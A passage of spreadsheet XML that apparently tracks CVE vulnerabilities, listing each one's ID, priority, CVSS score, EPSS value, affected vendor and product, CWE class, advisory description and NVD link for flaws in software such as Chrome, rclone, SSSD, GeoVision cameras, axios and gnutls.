      <c r="H2882" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2882" s="5" t="inlineStr"/>
      <c r="K2882" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2882" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M2882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87601</t>
        </is>
      </c>
    </row>
    <row r="2883">
      <c r="A2883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87734</t>
        </is>
      </c>
      <c r="C2883" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2883" s="5" t="inlineStr"/>
      <c r="F2883" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2883" s="5" t="inlineStr"/>
      <c r="H2883" s="5" t="inlineStr"/>
      <c r="I2883" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2883" s="5" t="inlineStr"/>
      <c r="K2883" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="L2883" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the utcp package before 0.0.6 for OCaml. Out-of-order segment reassembly allows remote denial of service.</t>
        </is>
      </c>
      <c r="M2883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87734</t>
        </is>
      </c>
    </row>
    <row r="2884">
      <c r="A2884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="C2884" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2884" s="5" t="inlineStr"/>
      <c r="F2884" s="5" t="inlineStr"/>
      <c r="G2884" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2884" s="5" t="inlineStr"/>
      <c r="I2884" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2884" s="5" t="inlineStr"/>
      <c r="K2884" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="L2884"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M2884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="2885">
      <c r="A2885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87853</t>
        </is>
      </c>
      <c r="C2885" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2885" s="5" t="inlineStr"/>
      <c r="F2885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2885" s="5" t="inlineStr"/>
      <c r="H2885" s="5" t="inlineStr"/>
      <c r="I2885" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2885" s="5" t="inlineStr"/>
      <c r="K2885" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="L2885" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SSSD's IdP authentication provider. The eval_access_token_buf() function compares the OIDC subject identifier using strncmp() with the authenticated user's identifier length, performing a prefix comparison instead of an exact match. An attacker whose IdP identifier is a strict prefix of a target user's identifier can authenticate as the target user.</t>
        </is>
      </c>
      <c r="M2885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87853</t>
        </is>
      </c>
    </row>
    <row r="2886">
      <c r="A2886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="C2886" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2886" s="5" t="inlineStr"/>
      <c r="F2886" s="5" t="inlineStr"/>
      <c r="G2886" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2886" s="5" t="inlineStr"/>
      <c r="I2886" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2886" s="5" t="inlineStr"/>
      <c r="K2886" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2886"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M2886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="2887">
      <c r="A2887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88045</t>
        </is>
      </c>
      <c r="C2887" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2887" s="5" t="inlineStr"/>
      <c r="F2887" s="5" t="inlineStr"/>
      <c r="G2887" s="5" t="inlineStr"/>
      <c r="H2887" s="5" t="inlineStr"/>
      <c r="I2887" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2887" s="5" t="inlineStr"/>
      <c r="K2887" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L2887" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.75.0 until 1.75.1, the serve S3 streamed multipart path in cmd/serve/s3/multipart.go passes attacker-controlled contentLength to multipart.NewRW().Reserve before reading request-body bytes. waitForTurn admits the current part and one oversized part when the buffer is empty despite --multipart-streaming-buffer-limit, and lib/pool allocates 1 MiB pages according to Content-Length or X-Amz-Decoded-Content-Length. A network client can retain or multiply these reservations without sending the declared body, exhausting process or host memory or permanently blocking request handlers. Anonymous S3 deployments require no credentials, while deployments using auth_key require an accepted S3 key. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M2887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88045</t>
        </is>
      </c>
    </row>
    <row r="2888">
      <c r="A2888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88286</t>
        </is>
      </c>
      <c r="C2888" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2888" s="5" t="inlineStr"/>
      <c r="F2888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2888" s="5" t="inlineStr"/>
      <c r="H2888" s="5" t="inlineStr"/>
      <c r="I2888" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2888" s="5" t="inlineStr"/>
      <c r="K2888" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2888" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 improperly manages PTZ connection state, allowing an unauthenticated remote client to block the accept loop and prevent new PTZ connections.</t>
        </is>
      </c>
      <c r="M2888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88286</t>
        </is>
      </c>
    </row>
    <row r="2889">
      <c r="A2889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88287</t>
        </is>
      </c>
      <c r="C2889" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2889" s="5" t="inlineStr"/>
      <c r="F2889" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2889" s="5" t="inlineStr"/>
      <c r="H2889" s="5" t="inlineStr"/>
      <c r="I2889" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2889" s="5" t="inlineStr"/>
      <c r="K2889" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2889" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to bound the number of Scopes tokens in unauthenticated ONVIF WS-Discovery Probe requests, allowing a remote attacker to corrupt stack control state and crash the discovery process.</t>
        </is>
      </c>
      <c r="M2889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88287</t>
        </is>
      </c>
    </row>
    <row r="2890">
      <c r="A2890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88289</t>
        </is>
      </c>
      <c r="C2890" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2890" s="5" t="inlineStr"/>
      <c r="F2890" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2890" s="5" t="inlineStr"/>
      <c r="H2890" s="5" t="inlineStr"/>
      <c r="I2890" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2890" s="5" t="inlineStr"/>
      <c r="K2890" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2890" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.14 (260903) fails to validate attacker-controlled variable-length fields before copying them into fixed-size stack buffers in multiple VLSVR request handlers, allowing an unauthenticated remote attacker to crash the VLSVR service.</t>
        </is>
      </c>
      <c r="M2890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88289</t>
        </is>
      </c>
    </row>
    <row r="2891">
      <c r="A2891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88290</t>
        </is>
      </c>
      <c r="C2891" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2891" s="5" t="inlineStr"/>
      <c r="F2891" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2891" s="5" t="inlineStr"/>
      <c r="H2891" s="5" t="inlineStr"/>
      <c r="I2891" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2891" s="5" t="inlineStr"/>
      <c r="K2891" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2891" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.14 (260903) allows unauthenticated clients to declare unbounded VLSVR frame lengths and indefinitely delay blocking receives, allowing remote exhaustion of memory, connection, and worker resources.</t>
        </is>
      </c>
      <c r="M2891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88290</t>
        </is>
      </c>
    </row>
    <row r="2892">
      <c r="A2892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8862</t>
        </is>
      </c>
      <c r="C2892" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2892" s="5" t="inlineStr"/>
      <c r="F2892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2892" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2892" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I2892" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2892" s="5" t="inlineStr"/>
      <c r="K2892" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2892" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 has credentials that are hardcoded in the application source code, allowing unauthorized access to the container registry. The exposed secret enables attackers to pull private container images, potentially revealing proprietary code, configuration details, and other sensitive information.</t>
        </is>
      </c>
      <c r="M2892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8862</t>
        </is>
      </c>
    </row>
    <row r="2893">
      <c r="A2893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9166</t>
        </is>
      </c>
      <c r="C2893" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2893" s="5" t="inlineStr"/>
      <c r="F2893" s="5" t="inlineStr"/>
      <c r="G2893" s="5" t="inlineStr"/>
      <c r="H2893" s="5" t="inlineStr"/>
      <c r="I2893" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2893" s="5" t="inlineStr"/>
      <c r="K2893" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2893" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in GIS Informatics GisLab Laboratory Management System allows Path Traversal.
This issue affects GisLab Laboratory Management System: from 1.4.03 before 1.5.</t>
        </is>
      </c>
      <c r="M2893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9166</t>
        </is>
      </c>
    </row>
    <row r="2894">
      <c r="A2894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2894" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-1249</t>
        </is>
      </c>
      <c r="C2894" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2894" s="5" t="inlineStr"/>
      <c r="F2894" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2894" s="5" t="inlineStr"/>
      <c r="H2894" s="5" t="inlineStr"/>
      <c r="I2894" s="5" t="inlineStr">
        <is>
          <t>2024-04-17</t>
        </is>
      </c>
      <c r="J2894" s="5" t="inlineStr"/>
      <c r="K2894" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L2894" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.</t>
        </is>
      </c>
      <c r="M2894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-1249</t>
        </is>
      </c>
    </row>
    <row r="2895">
      <c r="A2895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13608</t>
        </is>
      </c>
      <c r="C2895" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2895" s="5" t="inlineStr"/>
      <c r="F2895" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2895" s="5" t="inlineStr"/>
      <c r="H2895" s="5" t="inlineStr"/>
      <c r="I2895" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2895" s="5" t="inlineStr"/>
      <c r="K2895" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="L2895" s="5" t="inlineStr">
        <is>
          <t>A flaw in the libcurl SASL negotiation for LDAP authentication allows an
incomplete handshake sequence to be misinterpreted as a successful
cryptographic verification. An attacker executing a Man-in-the-Middle (MITM)
attack can inject a premature or shortcut response that bypasses complete peer
validation.</t>
        </is>
      </c>
      <c r="M2895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13608</t>
        </is>
      </c>
    </row>
    <row r="2896">
      <c r="A2896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18489</t>
        </is>
      </c>
      <c r="C2896" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2896" s="5" t="inlineStr"/>
      <c r="F2896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2896" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2896" s="5" t="inlineStr"/>
      <c r="I2896" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2896" s="5" t="inlineStr"/>
      <c r="K2896" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2896" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway - Translate utility &lt;= 1.0.8 MCP Context Forge could allow a remote attacker to obtain sensitive information from other sessions due to exposure of data elements to the wrong session.</t>
        </is>
      </c>
      <c r="M2896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18489</t>
        </is>
      </c>
    </row>
    <row r="2897">
      <c r="A2897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="C2897" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2897" s="5" t="inlineStr"/>
      <c r="F2897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2897" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2897" s="5" t="inlineStr"/>
      <c r="I2897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2897" s="5" t="inlineStr"/>
      <c r="K2897" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2897" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="M2897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="2898">
      <c r="A2898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32589</t>
        </is>
      </c>
      <c r="C2898" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2898" s="5" t="inlineStr"/>
      <c r="F2898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2898" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H2898" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I2898" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2898" s="5" t="inlineStr"/>
      <c r="K2898" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2898" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.</t>
        </is>
      </c>
      <c r="M2898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32589</t>
        </is>
      </c>
    </row>
    <row r="2899">
      <c r="A2899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3833</t>
        </is>
      </c>
      <c r="C2899" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2899" s="5" t="inlineStr"/>
      <c r="F2899" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2899" s="5" t="inlineStr"/>
      <c r="H2899" s="5" t="inlineStr">
        <is>
          <t>gnu:gnutls, redhat:enterprise_linux, redhat:hardened_images, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I2899" s="5" t="inlineStr">
        <is>
          <t>2026-04-30</t>
        </is>
      </c>
      <c r="J2899" s="5" t="inlineStr"/>
      <c r="K2899" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L2899" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.</t>
        </is>
      </c>
      <c r="M2899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3833</t>
        </is>
      </c>
    </row>
    <row r="2900">
      <c r="A2900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42033</t>
        </is>
      </c>
      <c r="C2900" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2900" s="5" t="inlineStr"/>
      <c r="F2900" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2900" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2900" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2900" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J2900" s="5" t="inlineStr"/>
      <c r="K2900" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L2900" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M2900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42033</t>
        </is>
      </c>
    </row>
    <row r="2901">
      <c r="A2901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48079</t>
        </is>
      </c>
      <c r="C2901" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2901" s="5" t="inlineStr"/>
      <c r="F2901" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2901" s="5" t="inlineStr"/>
      <c r="H2901" s="5" t="inlineStr"/>
      <c r="I2901" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2901" s="5" t="inlineStr"/>
      <c r="K2901" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2901" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, when a user navigates to the `/logout` page, the page's server-side load handler deletes the `access_token` cookie before calling `/api/auth/logout` via an internal `event.fetch()`. The internal fetch consequently runs without the auth cookie, so `apiAuthHandle` rejects it, the logout handler never executes, and `SessionService.revokeSession()` is never called for the current session. The DB session row remains valid until its natural expiry (one week by default). The user sees a successful logout (cookie gone, UI returns to login), but any party still holding a copy of the now-deleted access token can continue making authenticated API calls until the session naturally expires. The root cause is a simple ordering mistake. The same auth subsystem implements the correct order in `/api/auth/logout`: revoke the current DB session first, then delete the cookie. The page-level wrapper does the opposite. Version 1.0.2 initiates server-side logout before removing authentication cookies and first appears in version 1.0.2. Version 2.0.0 later replaces this with a race-free client-side logout flow.</t>
        </is>
      </c>
      <c r="M2901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48079</t>
        </is>
      </c>
    </row>
    <row r="2902">
      <c r="A2902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48084</t>
        </is>
      </c>
      <c r="C2902" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2902" s="5" t="inlineStr"/>
      <c r="F2902" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2902" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H2902" s="5" t="inlineStr"/>
      <c r="I2902" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2902" s="5" t="inlineStr"/>
      <c r="K2902" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L2902" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Versions prior to 1.0.2 don't throttle failed passphrase login attempts. An attacker can submit unlimited wrong passphrase guesses against any known email address, capped only by the Argon2 verification cost (about 100 milliseconds per attempt on the tested host, giving 10 attempts per second sustained). The same backend implements a working per-account throttle on the WebAuthn challenge endpoint, which returns HTTP 429 after roughly 19 attempts. The passphrase branch simply does not invoke that throttle, leaving a supported high-value login path unprotected against credential stuffing and dictionary attacks. The asymmetry confirms this is an oversight rather than a design choice. The throttle infrastructure exists, is wired into the same auth backend, and works on the WebAuthn path. The passphrase branch in `/api/auth/login` was not updated to record failed attempts. Combined with the application's minimum-passphrase policy (12 characters, no entropy or dictionary checks), accounts using common base patterns such as `Spring2026!XX` or words from a leak corpus are realistically reachable in days on a single CPU, hours on a small GPU farm. Version 1.0.2 patches the issue.</t>
        </is>
      </c>
      <c r="M2902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48084</t>
        </is>
      </c>
    </row>
    <row r="2903">
      <c r="A2903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48526</t>
        </is>
      </c>
      <c r="C2903" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2903" s="5" t="inlineStr"/>
      <c r="F2903" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2903" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2903" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I2903" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2903" s="5" t="inlineStr"/>
      <c r="K2903" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347</t>
        </is>
      </c>
      <c r="L2903" s="5" t="inlineStr">
        <is>
